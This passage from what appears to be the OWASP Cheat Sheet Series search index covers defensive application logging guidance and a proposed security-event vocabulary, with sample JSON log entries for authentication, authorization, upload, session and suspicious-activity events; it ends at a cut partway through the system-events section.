Never exclude any events from \"known\" users such as other internal systems, \"trusted\" third parties, search engine robots, uptime/process and other remote monitoring systems, pen testers, auditors. However, you may want to include a classification flag for each of these in the recorded data.

The following should usually not be recorded directly in the logs, but instead should be removed, masked, sanitized, hashed or encrypted:

Sometimes the following data can also exist, and whilst useful for subsequent investigation, it may also need to be treated in some special manner before the event is recorded:

Consider using personal data de-identification techniques such as deletion, scrambling or pseudonymization of direct and indirect identifiers where the individual's identity is not required, or the risk is considered too great.

In some systems, sanitization can be undertaken post log collection, and prior to log display.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#customizable-logging","title":"Customizable logging","text":"

It may be desirable to be able to alter the level of logging (type of events based on severity or threat level, amount of detail recorded). If this is implemented, ensure that:

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#event-collection","title":"Event collection","text":"

If your development framework supports suitable logging mechanisms use, or build upon that. Otherwise, implement an application-wide log handler which can be called from other modules/components.

Document the interface referencing the organisation-specific event classification and description syntax requirements.

If possible create this log handler as a standard module that can be thoroughly tested, deployed in multiple applications, and added to a list of approved & recommended modules.

Note C: This is not always possible where the application is running on a device under some other party's control (e.g. on an individual's mobile phone, on a remote customer's workstation which is on another corporate network). In these cases attempt to measure the time offset, or record a confidence level in the event timestamp.

Where possible record data in a standard format, or at least ensure it can be exported/broadcast using an industry-standard format.

In some cases, events may be relayed or collected together in intermediate points. In the latter some data may be aggregated or summarized before forwarding on to a central repository and analysis system.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#verification","title":"Verification","text":"

Logging functionality and systems must be included in code review, application testing and security verification processes:

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#network-architecture","title":"Network architecture","text":"

As an example, the diagram below shows a service that provides business functionality to customers. We recommend creating a centralized system for collecting logs. There may be many such services, but all of them must securely collect logs in a centralized system.

Applications of this business service are located in network segments:

The service responsible for collecting IT events, including security events, is located in the following segments:

For example, all external requests from users go through the API management service, see application in MIDDLEWARE 2 segment.

As you can see in the image above, at the network level, the processes of saving and downloading logs require opening different network accesses (ports), arrows are highlighted in different colors. Also, saving and downloading are performed by different applications.

Full network segmentation cheat sheet by sergiomarotco: link

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#deployment-and-operation","title":"Deployment and operation","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html#release","title":"Release","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html#operation","title":"Operation","text":"

Enable processes to detect whether logging has stopped, and to identify tampering or unauthorized access and deletion (see protection below).

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#protection","title":"Protection","text":"

The logging mechanisms and collected event data must be protected from mis-use such as tampering in transit, and unauthorized access, modification and deletion once stored. Logs may contain personal and other sensitive information, or the data may contain information regarding the application's code and logic.

In addition, the collected information in the logs may itself have business value (to competitors, gossip-mongers, journalists and activists) such as allowing the estimate of revenues, or providing performance information about employees.

This data may be held on end devices, at intermediate points, in centralized repositories and in archives and backups.

Consider whether parts of the data may need to be excluded, masked, sanitized, hashed or encrypted during examination or extraction.

At rest:

In transit:

See NIST SP 800-92 Guide to Computer Security Log Management for more guidance.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#monitoring-of-events","title":"Monitoring of events","text":"

The logged event data needs to be available to review and there are processes in place for appropriate monitoring, alerting and reporting:

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#disposal-of-logs","title":"Disposal of logs","text":"

Log data, temporary debug logs, and backups/copies/extractions, must not be destroyed before the duration of the required data retention period, and must not be kept beyond this time.

Legal, regulatory and contractual obligations may impact on these periods.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#attacks-on-logs","title":"Attacks on Logs","text":"

Because of their usefulness as a defense, logs may be a target of attacks. See also OWASP Log Injection and CWE-117.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#confidentiality","title":"Confidentiality","text":"

Who should be able to read what? A confidentiality attack enables an unauthorized party to access sensitive information stored in logs.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#integrity","title":"Integrity","text":"

Which information should be modifiable by whom?

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#availability","title":"Availability","text":"

What downtime is acceptable?

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#accountability","title":"Accountability","text":"

Who is responsible for harm?

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#related-articles","title":"Related articles","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html","title":"Application Logging Vocabulary Cheat Sheet","text":"

This document proposes a standard vocabulary for logging security events. The intent is to simplify monitoring and alerting such that, assuming developers trap errors and log them using this vocabulary, monitoring and alerting would be improved by simply keying on these terms.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#overview","title":"Overview","text":"

Each year IBM Security commissions the Ponemon Institute to survey companies around the world for information related to security breaches, mitigation, and the associated costs; the result is called the Cost of a Data Breach Report.

In addition to the millions of dollars lost due to breaches the report finds that the mean time to identify a breach continues to hover around 200 days. Clearly our ability to monitor applications and alert on anomalous behavior would improve our time to identify and mitigate an attack against our applications.

IBM Cost of a Data Breach Study 2020, Fig.34, pg.52, [https://www.ibm.com/security/data-breach]

This logging standard would seek to define specific keywords which, when applied consistently across software, would allow groups to simply monitor for these events terms across all applications and respond quickly in the event of attack.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#assumptions","title":"Assumptions","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#getting-started","title":"Getting Started","text":"

As a reminder, the goal of logging is to be able to alert on specific security events. Of course, the first step to logging these events is good error handling, if you're not trapping the events, you don't have an event to log.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#identifying-events","title":"Identifying Events","text":"

In order to better understand security event logging a good high-level understanding of threat modeling would be helpful, even if it's a simple approach of:

  1. What could go wrong?

  2. Orders: could someone order on behalf of another?

  3. Authentication: could I log in as someone else?
  4. Authorization: could I see someone else' account?

  5. What would happen if it did?

  6. Orders: I've placed an order on behalf of another... to an abandoned warehouse in New Jersey. Oops.

  7. Then I bragged about it on 4Chan.
  8. Then I told the New York Times about it.

  9. Who might intend to do this?

  10. Intentional attacks by hackers.

  11. An employee \"testing\" how things work.
  12. An API coded incorrectly doing things the author did not intend.
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#format","title":"Format","text":"

NOTE: All dates should be logged in ISO 8601 format WITH UTC offset to ensure maximum portability

{\n    \"datetime\": \"2021-01-01T01:01:01-0700\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"AUTHN_login_success:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 login successfully\",\n    \"useragent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\",\n    \"source_ip\": \"165.225.50.94\",\n    \"host_ip\": \"10.12.7.9\",\n    \"hostname\": \"portalauth.foobar.com\",\n    \"protocol\": \"https\",\n    \"port\": \"440\",\n    \"request_uri\": \"/api/v2/auth/\",\n    \"request_method\": \"POST\",\n    \"region\": \"AWS-US-WEST-2\",\n    \"geo\": \"USA\"\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#the-vocabulary","title":"The Vocabulary","text":"

What follows are the various event types that should be captured. For each event type there is a prefix like \"authn\" and additional data that should be included for that event.

Portions of the full logging format are included for example, but a complete event log should follow the format above.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authentication-authn","title":"Authentication [AUTHN]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_successuserid","title":"authn_login_success[:userid]","text":"

Description All login events should be recorded including success.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_success:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 login successfully\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_successafterfailuseridretries","title":"authn_login_successafterfail[:userid,retries]","text":"

Description The user successfully logged in after previously failing.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_successafterfail:joebob1,2\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 login successfully\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_failuserid","title":"authn_login_fail[:userid]","text":"

Description All login events should be recorded including failure.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_fail:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 login failed\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_fail_maxuseridmaxlimitint","title":"authn_login_fail_max[:userid,maxlimit(int)]","text":"

Description All login events should be recorded including failure.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_fail_max:joebob1,3\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 reached the login fail limit of 3\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_lockuseridreason","title":"authn_login_lock[:userid,reason]","text":"

Description When the feature exists to lock an account after x retries or other condition, the lock should be logged with relevant data.

Level: WARN

Reasons:

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_lock:joebob1,maxretries\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 login locked because maxretries exceeded\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_password_changeuserid","title":"authn_password_change[:userid]","text":"

Description Every password change should be logged, including the userid that it was for.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_password_change:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 has successfully changed their password\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_password_change_failuserid","title":"authn_password_change_fail[:userid]","text":"

Description An attempt to change a password that failed. May also trigger other events such as authn_login_lock.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_password_change:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 failed to changing their password\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_impossible_traveluseridregion1region2","title":"authn_impossible_travel[:userid,region1,region2]","text":"

Description When a user is logged in from one city and suddenly appears in another, too far away to have traveled in a reasonable timeframe, this often indicates a potential account takeover.

Level:: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_impossible_travel:joebob1,US-OR,CN-SH\",\n    \"level\": \"CRITICAL\",\n    \"description\": \"User joebob1 has accessed the application in two distant cities at the same time\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_token_createduserid-entitlements","title":"authn_token_created[:userid, entitlement(s)]","text":"

Description When a token is created for service access it should be recorded

Level:: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"aws.foobar.com\",\n    \"event\": \"authn_token_created:app.foobarapi.prod,create,read,update\",\n    \"level\": \"INFO\",\n    \"description\": \"A token has been created for app.foobarapi.prod with create,read,update\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_token_revokeduseridtokenid","title":"authn_token_revoked[:userid,tokenid]","text":"

Description A token has been revoked for the given account.

Level:: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"aws.foobar.com\",\n    \"event\": \"authn_token_revoked:app.foobarapi.prod,xyz-abc-123-gfk\",\n    \"level\": \"INFO\",\n    \"description\": \"Token ID: xyz-abc-123-gfk was revoked for user app.foobarapi.prod\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_token_reuseuseridtokenid","title":"authn_token_reuse[:userid,tokenid]","text":"

Description A previously revoked token was attempted to be reused.

Level:: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"aws.foobar.com\",\n    \"event\": \"authn_token_reuse:app.foobarapi.prod,xyz-abc-123-gfk\",\n    \"level\": \"CRITICAL\",\n    \"description\": \"User app.foobarapi.prod attempted to use token ID: xyz-abc-123-gfk which was previously revoked\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_token_deleteappid","title":"authn_token_delete[:appid]","text":"

Description When a token is deleted it should be recorded

Level:: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_token_delete:foobarapi\",\n    \"level\": \"WARN\",\n    \"description\": \"The token for foobarapi has been deleted\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authorization-authz","title":"Authorization [AUTHZ]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authz_failuseridresource","title":"authz_fail[:userid,resource]","text":"

Description An attempt was made to access a resource which was unauthorized

Level:: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authz_fail:joebob1,resource\",\n    \"level\": \"CRITICAL\",\n    \"description\": \"User joebob1 attempted to access a resource without entitlement\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authz_changeuseridfromto","title":"authz_change[:userid,from,to]","text":"

Description The user or entity entitlements was changed

Level:: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authz_change:joebob1,user,admin\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 access was changed from user to admin\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authz_adminuseridevent","title":"authz_admin[:userid,event]","text":"

Description All activity by privileged users such as admin should be recorded.

Level:: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authz_admin:joebob1,user_privilege_change\",\n    \"level\": \"WARN\",\n    \"description\": \"Administrtator joebob1 has updated privileges of user foobarapi from user to admin\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#excessive-use-excess","title":"Excessive Use [EXCESS]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#excess_rate_limit_exceededuseridmax","title":"excess_rate_limit_exceeded[userid,max]","text":"

Description Expected service limit ceilings should be established and alerted when exceeded, even if simply for managing costs and scaling.

Level:: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"excess_rate_limit_exceeded:app.foobarapi.prod,100000\",\n    \"level\": \"WARN\",\n    \"description\": \"User app.foobarapi.prod has exceeded max:100000 requests\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#file-upload-upload","title":"File Upload [UPLOAD]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#upload_completeuseridfilenametype","title":"upload_complete[userid,filename,type]","text":"

Description On successful file upload the first step in the validation process is that the upload has completed.

Level:: INFO

Example:

    {\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"upload_complete:joebob1,user_generated_content.png,PNG\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 has uploaded user_generated_content.png\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#upload_storedfilenamefromto","title":"upload_stored[filename,from,to]","text":"

Description One step in good file upload validation is to move/rename the file and when providing the content back to end users, never reference the original filename in the download. This is true both when storing in a filesystem as well as in block storage.

Level:: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"upload_stored:user_generated_content.png,kjsdhkrjhwijhsiuhdf000010202002\",\n    \"level\": \"INFO\",\n    \"description\": \"File user_generated_content.png was stored in the database with key abcdefghijk101010101\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#upload_validationfilenamevirusscanimagemagickfailedincompletepassed","title":"upload_validation[filename,(virusscan|imagemagick|...):(FAILED|incomplete|passed)]","text":"

Description All file uploads should have some validation performed, both for correctness (is in fact of file type x), and for safety (does not contain a virus).

Level:: INFO|CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"upload_validation:filename,virusscan:FAILED\",\n    \"level\": \"CRITICAL\",\n    \"description\": \"File user_generated_content.png FAILED virus scan and was purged\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#upload_deleteuseridfileid","title":"upload_delete[userid,fileid]","text":"

Description When a file is deleted for normal reasons it should be recorded.

Level:: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"upload_delete:joebob1,\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 has marked file abcdefghijk101010101 for deletion.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#input-validation-input","title":"Input Validation [INPUT]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#input_validation_failfielduserid","title":"input_validation_fail[:field,userid]","text":"

Description When input validation fails on the server-side it must either be because a) sufficient validation was not provided on the client, or b) client-side validation was bypassed. In either case it's an opportunity for attack and should be mitigated quickly.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"input_validation_fail:date_of_birth,joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 submitted data that failed validation.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious-behavior-malicious","title":"Malicious Behavior [MALICIOUS","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_excess_404useridipuseragent","title":"malicious_excess_404:[userid|IP,useragent]","text":"

Description When a user makes numerous requests for files that don't exist it often is an indicator of attempts to \"force-browse\" for files that could exist and is often behavior indicating malicious intent.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_excess404:123.456.789.101,M@l1c10us-Hax0rB0t0-v1\",\n    \"level\": \"WARN\",\n    \"description\": \"A user at 123.456.789.101 has generated a large number of 404 requests.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_extraneoususeridipinputnameuseragent","title":"malicious_extraneous:[userid|IP,inputname,useragent]","text":"

Description When a user submits data to a backend handler that was not expected it can indicate probing for input validation errors. If your backend service receives data it does not handle or have an input for this is an indication of likely malicious abuse.

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_extraneous:dr@evil.com,creditcardnum,Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0\",\n    \"level\": \"WARN\",\n    \"description\": \"User dr@evil.com included field creditcardnum in the request which is not handled by this service.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_attack_tooluseridiptoolnameuseragent","title":"malicious_attack_tool:[userid|IP,toolname,useragent]","text":"

Description When obvious attack tools are identified either by signature or by user agent they should be logged.

TODO: A future version of this standard should link to known attack tools, signatures and user-agent strings. For instance, the tool \"Nikto\" leaves behind its user agent by default with a string like \"Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:Port Check)\"

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_attack_tool:127.0.0.1,nikto,Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:Port Check)\",\n    \"level\": \"WARN\",\n    \"description\": \"Attack traffic indicating use of Nikto coming from 127.0.0.1\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_corsuseridipuseragentreferer","title":"malicious_cors:[userid|IP,useragent,referer]","text":"

Description When attempts are made from unauthorized origins they should of course be blocked, but also logged whenever possible. Even if we block an illegal cross-origin request the fact that the request is being made could be an indication of attack.

NOTE: Did you know that the word \"referer\" is misspelled in the original HTTP specification? The correct spelling should be \"referrer\" but the original typo persists to this day and is used here intentionally.

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_cors:127.0.0.1,Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0,attack.evil.com\",\n    \"level\": \"WARN\",\n    \"description\": \"An illegal cross-origin request from 127.0.0.1 was referred from attack.evil.com\"\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_direct_referenceuseridip-useragent","title":"malicious_direct_reference:[userid|IP, useragent]","text":"

Description A common attack against authentication and authorization is to directly access an object without credentials or appropriate access authority. Failing to prevent this flaw used to be one of the OWASP Top Ten called Insecure Direct Object Reference. Assuming you've correctly prevented this attack, logging the attempt is valuable to identify malicious users.

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_direct:joebob1, Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 attempted to access an object to which they are not authorized\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#privilege-changes-privilege","title":"Privilege Changes [PRIVILEGE]","text":"

This section focuses on object privilege changes such as read/write/execute permissions or objects in a database having authorization meta-information changed.

Changes to user/account are covered in the User Management section.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#privilege_permissions_changeduseridfileobjectfromleveltolevel","title":"privilege_permissions_changed:[userid,file|object,fromlevel,tolevel]","text":"

Description Tracking changes to objects to which there are access control restrictions can uncover attempt to escalate privilege on those files by unauthorized users.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_direct:joebob1, /users/admin/some/important/path,0511,0777\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 changed permissions on /users/admin/some/important/path\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive-data-changes-data","title":"Sensitive Data Changes [DATA]","text":"

It's not necessary to log or alert on changes to all files, but in the case of highly sensitive files or data it is important that we monitor and alert on changes.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive_createuseridfileobject","title":"sensitive_create:[userid,file|object]","text":"

Description When a new piece of data is created and marked as sensitive or placed into a directory/table/repository where sensitive data is stored, that creation should be logged and reviewed periodically.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sensitive_create:joebob1, /users/admin/some/important/path\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 created a new file in /users/admin/some/important/path\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive_readuseridfileobject","title":"sensitive_read:[userid,file|object]","text":"

Description All data marked as sensitive or placed into a directory/table/repository where sensitive data is stored should be have access logged and reviewed periodically.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sensitive_read:joebob1, /users/admin/some/important/path\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 read file /users/admin/some/important/path\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive_updateuseridfileobject","title":"sensitive_update:[userid,file|object]","text":"

Description All data marked as sensitive or placed into a directory/table/repository where sensitive data is stored should be have updates to the data logged and reviewed periodically.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sensitive_update:joebob1, /users/admin/some/important/path\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 modified file /users/admin/some/important/path\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive_deleteuseridfileobject","title":"sensitive_delete:[userid,file|object]","text":"

Description All data marked as sensitive or placed into a directory/table/repository where sensitive data is stored should have deletions of the data logged and reviewed periodically. The file should not be immediately deleted but marked for deletion and an archive of the file should be maintained according to legal/privacy requirements.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sensitive_delete:joebob1, /users/admin/some/important/path\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 marked file /users/admin/some/important/path for deletion\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sequence-errors-sequence","title":"Sequence Errors [SEQUENCE]","text":"

Also called a business logic attack, if a specific path is expected through a system and an attempt is made to skip or change the order of that path it could indicate malicious intent.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sequence_failuserid","title":"sequence_fail:[userid]","text":"

Description When a user reaches a part of the application out of sequence it may indicate intentional abuse of the business logic and should be tracked.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sequence_fail:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 has reached a part of the application out of the normal application flow.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session-management-session","title":"Session Management [SESSION]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session_createduserid","title":"session_created:[userid]","text":"

Description When a new authenticated session is created that session may be logged and activity monitored.

Level: INFO

Example:

    {\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"session_created:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 has started a new session\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session_reneweduserid","title":"session_renewed:[userid]","text":"

Description When a user is warned of session to be expired/revoked and chooses to extend their session that activity should be logged. Also, if the system in question contains highly confidential data then extending a session may require additional verification.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"session_renewed:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 was warned of expiring session and extended.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session_expireduseridreason","title":"session_expired:[userid,reason]","text":"

Description When a session expires, especially in the case of an authenticated session or with sensitive data, then that session expiry may be logged and clarifying data included. The reason code may be any such as: logout, timeout, revoked, etc. Sessions should never be deleted but rather expired in the case of revocation requirement.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"session_expired:joebob1,revoked\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 session expired due to administrator revocation.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session_use_after_expireuserid","title":"session_use_after_expire:[userid]","text":"

Description In the case a user attempts to access systems with an expire session it may be helpful to log, especially if combined with subsequent login failure. This could identify a case where a malicious user is attempting a session hijack or directly accessing another person's machine/browser.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"session_use_after_expire:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 attempted access after session expired.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#system-events-sys","title":"System Events [SYS]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_startupuserid","title":"sys_startup:[userid]","text":"

Description When a system is first started it can be valuable to log the startup, even if the system is serverless or a container, especially if possible to log the user that initiated the system.

Level: WARN

Example:

